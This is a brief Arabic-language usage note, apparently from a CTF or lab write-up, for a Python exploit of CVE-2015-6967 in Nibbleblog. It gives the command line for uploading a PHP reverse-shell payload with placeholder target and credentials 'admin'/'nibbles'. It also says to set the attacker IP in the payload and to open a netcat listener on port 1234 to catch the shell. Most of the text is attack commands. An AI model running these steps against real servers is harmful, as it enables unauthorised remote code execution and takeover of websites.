
استغلّ Python لـ CVE-2015-6967 يستهدف Nibbleblog مع حمولة شل عكسية. ينفّذ تنفيذ كود عن بعد موثّق عبر ثغرة رفع ملفات.
python exploit.py --url http://xx.xx.xx.xx --username admin --password nibbles --payload phprevshell.php
تغيير $ip في السطر 7 من phprevshell.php
nc -lvnp 1234